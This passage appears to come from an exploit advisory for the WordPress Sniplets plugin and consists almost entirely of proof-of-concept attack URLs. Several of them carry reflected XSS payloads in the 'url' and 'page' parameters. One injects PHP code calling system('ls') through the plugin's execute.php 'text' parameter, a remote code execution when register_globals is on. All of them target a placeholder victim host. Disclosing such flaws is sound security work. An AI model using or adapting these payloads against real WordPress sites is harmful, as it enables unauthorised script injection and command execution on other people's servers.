    http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
    http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3Cli%3E

    Register Globals: Off

    Code:
    http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

    Remote Code Execution

    Register Globals: ON

    PoC:

    Code:
    http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);